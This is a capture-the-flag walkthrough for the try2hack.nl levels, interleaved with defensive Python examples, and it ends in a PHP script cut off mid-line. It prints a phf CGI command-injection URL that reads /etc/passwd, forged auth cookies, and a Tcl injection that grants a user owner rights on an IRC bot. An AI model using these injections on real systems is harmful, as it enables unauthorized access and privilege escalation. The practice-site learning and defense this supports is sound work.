try2hack.nl Walkthrough

Level 1

Right-click on the page and choose View Source, or just press Ctrl+U. There you can see a JavaScript:
You can easily see that the password is 'h4x0r'.

Level 2

Right-click is disabled here, so just press Ctrl+U to view the source. There you will see that a Flash file is included:
View the source of the flash file by entering this in the address bar in your browser: view-source:http://try2hack.nl/levels/level2.swf
There you will see the username and password among the mess.
txtUsername
try2hack
txtPassword
irtehh4x0r!

Level 3

You will get an annoying prompt that prevents you from viewing the source with right-click or Ctrl+U.
Just click on it and stop the browser before you get transferred to Disneyland!
View the source directly with: view-source:http://try2hack.nl/levels/level3-.xhtml
The JavaScript you will find is:
      pwd = prompt("Please enter the password for level 3:","");
      if (pwd==PASSWORD){
        alert("Allright!\nEntering Level 4 ...");
        location.href = CORRECTSITE;
      }
      else {
        alert("WRONG!\nBack to disneyland !!!");
        location.href = WRONGSITE;
      }
      PASSWORD="AbCdE";
      CORRECTSITE="level4-sfvfxc.xhtml";
      WRONGSITE="http://www.disney.com";
Never mind the JavaScript you see there; it's fake. Instead, check out the external JavaScript that is camouflaged right above it:
<script src="JavaScript"></script>
Let's check it out: view-source:http://try2hack.nl/levels/JavaScript
PASSWORD = "try2hackrawks";
CORRECTSITE = "level4-kdnvxs.xhtml";
WRONGSITE = "http://www.disney.com";
There you go!

Level 4

As you see in the source, the file you need to check out is http://try2hack.nl/levels/PasswdLevel4.class.
Get a Java decompiler; I recommend Cavaj, which you may find here: http://www.bysoft.se/sureshot/cavaj
Use Cavaj to decompile the class and check out the source:
import java.applet.Applet;
import java.applet.AppletContext;
import java.awt.*;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.io.*;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.EventObject;

public class PasswdLevel4 extends Applet
    implements ActionListener
{

    private URL finalurl;
    String infile;
    String inuser[];
    int totno;
    InputStream countConn;
    BufferedReader countData;
    URL inURL;
    TextField txtlogin;
    Label label1;
    Label label2;
    Label label3;
    TextField txtpass;
    Label lblstatus;
    Button ButOk;
    Button ButReset;
    Label lbltitle;

    public PasswdLevel4()
    {
        inuser = new String[22];
        totno = 0;
        countConn = null;
        countData = null;
        inURL = null;
        txtlogin = new TextField();
        label1 = new Label();
        label2 = new Label();
        label3 = new Label();
        txtpass = new TextField();
        lblstatus = new Label();
        ButOk = new Button();
        ButReset = new Button();
        lbltitle = new Label();
    }

    void ButOk_ActionPerformed(ActionEvent actionevent)
    {
        boolean flag = false;
        for(int i = 1; i <= totno / 2; i++)
        {
            if(txtlogin.getText().trim().toUpperCase().intern() == inuser[2 * (i - 1) + 2].trim().toUpperCase().intern() && txtpass.getText().trim().toUpperCase().intern() == inuser[2 * (i - 1) + 3].trim().toUpperCase().intern())
            {
                lblstatus.setText("Login Success, Loading..");
                flag = true;
                String s = inuser[1].trim().intern();
                String s1 = getParameter("targetframe");
                if(s1 == null)
                {
                    s1 = "_self";
                }
                try
                {
                    finalurl = new URL(getCodeBase(), s);
                }
                catch(MalformedURLException _ex)
                {
                    lblstatus.setText("Bad URL");
                }
                getAppletContext().showDocument(finalurl, s1);
            }
        }

        if(!flag)
        {
            lblstatus.setText("Invaild Login or Password");
        }
    }

    void ButReset_ActionPerformed(ActionEvent actionevent)
    {
        txtlogin.setText("");
        txtpass.setText("");
    }

    public void actionPerformed(ActionEvent actionevent)
    {
        Object obj = actionevent.getSource();
        if(obj == ButOk)
        {
            ButOk_ActionPerformed(actionevent);
            return;
        }
        if(obj == ButReset)
        {
            ButReset_ActionPerformed(actionevent);
        }
    }

    public void destroy()
    {
        ButOk.setEnabled(false);
        ButReset.setEnabled(false);
        txtlogin.setVisible(false);
        txtpass.setVisible(false);
    }

    public void inFile()
    {
        new StringBuffer();
        try
        {
            countConn = inURL.openStream();
            countData = new BufferedReader(new InputStreamReader(countConn));
            String s;
            while((s = countData.readLine()) != null) 
            {
                if(totno < 21)
                {
                    totno = totno + 1;
                    inuser[totno] = s;
                    s = "";
                } else
                {
                    lblstatus.setText("Cannot Exceed 10 users, Applet fail start!");
                    destroy();
                }
            }
        }
        catch(IOException ioexception)
        {
            getAppletContext().showStatus("IO Error:" + ioexception.getMessage());
        }
        try
        {
            countConn.close();
            countData.close();
            return;
        }
        catch(IOException ioexception1)
        {
            getAppletContext().showStatus("IO Error:" + ioexception1.getMessage());
        }
    }

    public void init()
    {
        setLayout(null);
        setSize(361, 191);
        add(txtlogin);
        txtlogin.setBounds(156, 72, 132, 24);
        label1.setText("Please Enter Login Name & Password");
        label1.setAlignment(1);
        add(label1);
        label1.setFont(new Font("Dialog", 1, 12));
        label1.setBounds(41, 36, 280, 24);
        label2.setText("Login");
        add(label2);
        label2.setFont(new Font("Dialog", 1, 12));
        label2.setBounds(75, 72, 36, 24);
        label3.setText("Password");
        add(label3);
        add(txtpass);
        txtpass.setEchoChar('*');
        txtpass.setBounds(156, 108, 132, 24);
        lblstatus.setAlignment(1);
        label3.setFont(new Font("Dialog", 1, 12));
        label3.setBounds(75, 108, 57, 21);
        add(lblstatus);
        lblstatus.setFont(new Font("Dialog", 1, 12));
        lblstatus.setBounds(14, 132, 344, 24);
        ButOk.setLabel("OK");
        add(ButOk);
        ButOk.setFont(new Font("Dialog", 1, 12));
        ButOk.setBounds(105, 156, 59, 23);
        ButReset.setLabel("Reset");
        add(ButReset);
        ButReset.setFont(new Font("Dialog", 1, 12));
        ButReset.setBounds(204, 156, 59, 23);
        lbltitle.setAlignment(1);
        add(lbltitle);
        lbltitle.setFont(new Font("Dialog", 1, 12));
        lbltitle.setBounds(12, 14, 336, 24);
        String s = getParameter("title");
        lbltitle.setText(s);
        ButOk.addActionListener(this);
        ButReset.addActionListener(this);
        infile = new String("level4");
        try
        {
            inURL = new URL(getCodeBase(), infile);
        }
        catch(MalformedURLException _ex)
        {
            getAppletContext().showStatus("Bad Counter URL:" + inURL);
        }
        inFile();
    }
}
Look at:
infile = new String("level4");
That's a file being loaded by the applet. Let's take a look at it: view-source:http://try2hack.nl/levels/level4
level5-fdvbdf.xhtml
appletking
pieceofcake
There you have the username and password.

Level 5

Download the zip file and extract it.
Download vbrun300.dll from http://www.dll-files.com/dllindex/dll-files.shtml?vbrun300 and place it in the same folder as LEVEL5.EXE
Get the Dodi VB decompiler from http://vbdis4.angelfire.com

Now try to open LEVEL5.EXE. You will probably get some errors, but that's OK. Now you will find some new files in your level5 folder.
The important files are LEVEL5.bas and main.txt

main.txt:
Global Const gc0006 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,:;-*+=~|&!_$#@()[]{}<\/>"
Global Const gc000A = "http://www.try2hack.nl/levels/level6-ksghvb.xhtml"
LEVEL5.bas:
If  edtUsername = Mid(gc0006, 56, 1) & Mid(gc0006, 28, 1) &
                  Mid(gc0006, 35, 1) & Mid(gc0006, 3, 1) & 
                  Mid(gc0006, 44, 1) & Mid(gc0006, 11, 1) & 
                  Mid(gc0006, 13, 1) & Mid(gc0006, 21, 1) Then
    If  edtPassword = Mid(gc0006, 45, 1) & Mid(gc0006, 48, 1) & 
                      Mid(gc0006, 25, 1) & Mid(gc0006, 32, 1) & 
                      Mid(gc0006, 15, 1) & Mid(gc0006, 40, 1) & 
                      Mid(gc0006, 25, 1) & Mid(gc0006, 14, 1) & 
                      Mid(gc0006, 19, 1) Then
        MsgBox "Level 6 can be found at: " & 
            Left$(gc000A, 37) & Mid(gc0006, 21, 1) & 
            Mid(gc0006, 14, 1) & Mid(gc0006, 29, 1) & 
            Mid(gc0006, 32, 1) & Mid(gc0006, 12, 1) & 
            Mid(gc0006, 14, 1) & Mid(gc000A, 44, 6), 0, "Horray!"
    End
  End If
End If
You should see that the username and password are built from the constant gc0006 in main.txt (don't get fooled by gc000A).
The second parameter in Mid() is the 1-based position of the character in gc0006.
I made a JavaScript to print out the username, password and the url to level6:
// Constants recovered from main.txt
var a = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,:;-*+=~|&!_$#@()[]{}<\/>";
var b = "http://www.try2hack.nl/levels/level6-ksghvb.xhtml";

// VB's Mid(s, n, 1) is 1-based, so it maps to s.substring(n - 1, n)
document.write("Username: " + 
                a.substring(55,56) +  a.substring(27,28) + a.substring(34,35) + a.substring(2,3) + 
                a.substring(43,44) + a.substring(10,11) + a.substring(12,13) + a.substring(20,21) + "\n"); 
document.write("Password: " + 
                a.substring(44,45) + a.substring(47,48) + a.substring(24,25) + a.substring(31,32) + 
                a.substring(14,15) + a.substring(39,40) + a.substring(24,25) + a.substring(13,14) + 
                a.substring(18,19) + "\n");
// Left$(b, 37) is the first 37 characters; Mid(b, 44, 6) is the 6 characters from position 44
document.write("Level 6 can be found at: "+ 
                b.substring(0,37) + a.substring(20,21) + a.substring(13,14) + a.substring(28,29) + 
                a.substring(31,32) + a.substring(11,12) + a.substring(13,14) + b.substring(43,49) + 
                " Horray!");

Level 6

Download and install Wireshark (you will find it easily on Google) or any other packet sniffer. Start capturing.
Now open LEVEL6.EXE and type a random username and password. You will see that you got some packets in Wireshark.
One of them contains this data:
(ENCRYPTION TYPE)
B*C*N**N

(USERNAME)
aaabb aaaaa aaaab abbab ababb aaaab

(PASSWORD)
aabaa abbaa aaaba baaaa babba abbba baaba abaaa abbab abbaa baaaa aaaaa babaa abaab baaab

(PAGE)
babab aabab abaab abbab aabbb aaaba
I googled B*C*N**N and found Baconian Cipher encryption.
Then I made this PHP script:
// Baconian codes in a..z order; i/j and u/v share a code, so 'abaaa' and 'baabb' appear twice
$x = array('aaaaa', 'aaaab', 'aaaba', 'aaabb', 'aabaa', 'aabab', 'aabba', 'aabbb', 'abaaa', 
           'abaaa', 'abaab', 'ababa', 'ababb', 'abbaa', 'abbab', 'abbba', 'abbbb', 'baaaa', 
           'baaab', 'baaba', 'baabb', 'baabb', 'babaa', 'babab', 'babba', 'babbb');

$y = range('a','z');

$s  = "Username:aaabb aaaaa aaaab abbab ababb aaaab" . "\n";
$s .= "Password:aabaa abbaa aaaba baaaa babba abbba baaba abaaa abbab abbaa baaaa aaaaa babaa abaab baaab" . "\n";
$s .= "url:babab aabab abaab abbab aabbb aaaba";

$s = str_replace($x, $y, $s);
$s = str_replace(' ', '', $s);
print $s;

Level 7

After I figured out that this level was broken, it was quite easy. The server first requires that you use IE 7.66.
I made a PHP script which sends an HTTP request where I set the User-Agent to meet the requirements.
Then the server complains that you are not using Unix or Linux, and then it wants you to be referred from a Microsoft site.
When the server is happy it gives you the URL to level 8.

This is the PHP script I made:
if (!$socket = fsockopen('try2hack.nl', 80, $errno, $errstr, 20)) {
    print $errno . "-" . $errstr;
} 
else {
    $out = "GET /levels/level7-xfkohc.php HTTP/1.1\r\n";
    $out .= "Host: try2hack.nl\r\n";
    $out .= "User-Agent: Mozilla/4.0 (compatible;MSIE 7.66;Linux)\r\n";
    $out .= "Referer: http://www.microsoft.com/ms.htm\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($socket, $out);
    while (!feof($socket)) {
        print fgets($socket, 2046);
    }
    fclose($socket);
}

Level 8

I googled cgi + phf and found http://insecure.org/sploits/phf-cgi.html which gave me this old phf exploit:
http://try2hack.nl/cgi-bin/phf?Qalias=%0A/bin/cat%20/etc/passwd
Now you see the root account and the encrypted password.
Then store the passwd file on your computer and use the classic John the Ripper program to crack it:

root:arse :)
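The request above works because the URL-encoded newline (%0A) in Qalias reaches a shell command line. As an added example (not from the original walkthrough), this Python scans access-log lines for CGI requests whose decoded query values contain CR or LF; the log lines, client addresses and function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Common Log Format (addresses and times are made up).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.0" 200 512
192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 301
192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/phf?Qalias=%0A/bin/cat%20/etc/passwd HTTP/1.0" 200 1024
192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /cgi-bin/search?q=a%0d%0ab HTTP/1.0" 200 88
"""

# client, method, request target and status from one log line
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
CONTROL = re.compile(r"[\r\n]")


def suspicious_cgi_requests(log_text, prefix="/cgi-bin/"):
    """Return (client, path, parameter, status) for each CGI request whose
    percent-decoded query names or values contain a CR or LF character."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, _method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.startswith(prefix):
            continue
        # parse_qsl percent-decodes, so %0A and %0d become real control characters
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if CONTROL.search(name) or CONTROL.search(value):
                hits.append((client, url.path, name, int(status)))
                break  # one finding per request is enough
    return hits


if __name__ == "__main__":
    for hit in suspicious_cgi_requests(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged line is worth triaging first, since it means the script ran rather than the request being rejected.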

Level 9

I tried to get some header information by sending a GET request like I did in Level 7.
I then noticed some cookies being set:
Set-Cookie: str_username=admin
Set-Cookie: str_password=yu0aertehbomb
Set-Cookie: auth=no
Sending a POST request with the login-data and setting the cookie auth to 'yes' seemed to do the trick:
if (!$socket = fsockopen('try2hack.nl', 80, $errno, $errstr, 20)) {
    print $errno . "-" . $errstr . "\n";
} 
else {
    $out  = "POST /levels/level9-gnapei.xhtml HTTP/1.1\r\n";
    $out .= "Host: try2hack.nl\r\n";
    $out .= "Connection: close\r\n";
    $out .= "Cookie: auth=yes; str_username=admin; str_password=yu0aertehbomb;\r\n";
    $out .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $out .= "Content-Length: 50\r\n\r\n";
    $out .= "username=admin&password=yu0aertehbomb&submit=Enter";
    fwrite($socket, $out);
    while (!feof($socket)) {
        print fgets($socket, 2046);
    }
    fclose($socket);
}
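The level accepts the client-supplied auth cookie as proof of login and also hands the password back in a cookie. As an added example (not part of the original walkthrough or the site's code), this Python contrasts that check with a session value the server signs and verifies; the function names, the `username|expiry|tag` layout and the one-hour lifetime are assumptions.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # stays on the server, never sent to the client


def weak_is_authenticated(cookies):
    """The pattern the level uses: trust a flag the client can edit freely."""
    return cookies.get("auth") == "yes"


def _tag(payload, key):
    return hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()


def issue_session(username, now, ttl=3600, key=SERVER_KEY):
    """Call only after the password was checked server-side.
    The cookie carries no password, just 'username|expiry|tag'."""
    if "|" in username:
        raise ValueError("separator not allowed in username")
    payload = f"{username}|{now + ttl}"
    return f"{payload}|{_tag(payload, key)}"


def verify_session(cookie_value, now, key=SERVER_KEY):
    """Return the username for a valid, unexpired cookie, otherwise None."""
    parts = cookie_value.split("|")
    if len(parts) != 3:
        return None
    username, expires, tag = parts
    expected = _tag(f"{username}|{expires}", key)
    # Constant-time comparison; bytes avoid errors on non-ASCII client input
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return None
    if int(expires) < now:  # expiry is trusted only after the tag matched
        return None
    return username


if __name__ == "__main__":
    print(weak_is_authenticated({"auth": "yes"}))            # forged flag is accepted
    cookie = issue_session("admin", now=1000)
    print(verify_session(cookie, now=1500))                  # valid session
    print(verify_session(cookie.replace("admin", "root", 1), now=1500))  # tampered
```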

Level 10

After you have done level 9 you get an IRC channel name and password. After joining you receive a binary welcome message.
Just go to my favorite binary encoding/decoding site http://www.nickciske.com/tools/binary.php and decode it.
As you can see, you get a command that you must write to the bot to show you the bug.
It looked like a script, but the characters were all messed up, so I thought this was ROT13, which replaces each letter with the letter 13 places to the right in the alphabet.
So the only thing I needed was to ROT13 it again (26 letters in the alphabet: 13+13):
print str_rot13('ovaq pgpe - CVAT pgpe:cvatercyl
cebp pgpe:cvatercyl {avpx hubfg unaq qrfg xrl net} {
frg qhe [rkce [havkgvzr] - $net]
chgfrei "ABGVPR $avpx :Lbhe cvat ercyl gbbx $qhe frpbaqf"}');
which transforms to:
bind ctcr - PING ctcr:pingreply
proc ctcr:pingreply {nick uhost hand dest key arg} {
    set dur [expr [unixtime] - $arg]
    putserv "NOTICE $nick :Your ping reply took $dur seconds"}
After almost 24 hours, x number of cups of coffee, trying and failing, and hours of googling and reading up on Eggdrop, I finally made it!
The argument sent with the ping is in most IRC clients a timestamp, but you can send what you want.
The bot lacks security: it doesn't check $arg for bad code. Time to exploit.
I tried sending raw data with the /quote command but that didn't work.
I then came across the /nctcp command in Irssi (/ctcpreply for mIRC), which I noticed sent some stuff along with the data that seemed to make a difference.
I think it was some UTF \x00\x01 thing:

Worked:
/nctcp LEVEL10-xxx PING [adduser yournick *!yourident@*]
/nctcp LEVEL10-xxx PING [chattr yournick +n]
I changed the password for the bot to '123456' by doing:
/msg LEVEL10-xxx pass 123456

Then start a dcc chat with the bot:
/dcc chat LEVEL10-xxx
The bot will msg you with the URL to level 11.
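The handler shown above passes $arg to expr without checking it. As an added illustration in Python (a model of the handler, not Eggdrop code and not from the original page), this parses a CTCP PING reply and accepts the argument only if it is a plain decimal timestamp; the function names and the 10-digit limit are assumptions.

```python
import re

CTCP_DELIM = "\x01"                     # CTCP payloads are wrapped in \x01 characters
UNIX_TIME = re.compile(r"[0-9]{1,10}")  # plain decimal seconds, nothing else


def parse_ctcp(text):
    """Split '\\x01COMMAND argument\\x01' into (COMMAND, argument).
    Returns None when the text is not CTCP framed."""
    if len(text) < 3 or text[0] != CTCP_DELIM or text[-1] != CTCP_DELIM:
        return None
    command, _, argument = text[1:-1].partition(" ")
    return command.upper(), argument


def ping_reply_seconds(text, now):
    """Return the round-trip time for a CTCP PING reply, or None when the
    argument is anything other than a timestamp that is not in the future."""
    parsed = parse_ctcp(text)
    if parsed is None or parsed[0] != "PING":
        return None
    argument = parsed[1]
    if not UNIX_TIME.fullmatch(argument):  # rejects brackets, spaces, signs, '$'
        return None
    sent = int(argument)
    return now - sent if sent <= now else None


def notice_for(nick, text, now):
    """Build the NOTICE line from validated values only; None means drop the reply."""
    seconds = ping_reply_seconds(text, now)
    if seconds is None:
        return None
    return f"NOTICE {nick} :Your ping reply took {seconds} seconds"


if __name__ == "__main__":
    now = 1700000003  # constructed clock value
    print(notice_for("alice", "\x01PING 1700000000\x01", now))
    print(notice_for("alice", "\x01PING [chattr yournick +n]\x01", now))
```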

Level 11

This PHP script seemed to work nicely:
$url = "http://www.try2hack.nl/levels/level11-vmituh.xhtml";
$html = file_get_contents($url);
$x = 1;
if (preg_match("/positions\s(.*?)\sand\s(\d+)\s/", $html, $m )) {
   $pos = explode(',', trim($m[1]));
   $pos[] = trim($m[2]);
}
if (preg_match("/:
(.*?)
/", $html, $m )) {
   $string = trim($m[1]);
}
foreach ($pos as $key => $value) {
   $x = bcmul($x, ord($string[$value - 1]));
}
$postvalue = substr($x, 0, 5);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'answer=' . $postvalue . '&submit=click here to continue');
$response = curl_exec($ch);
curl_close($ch);
print preg_replace('/.*?\s+(.*?.)?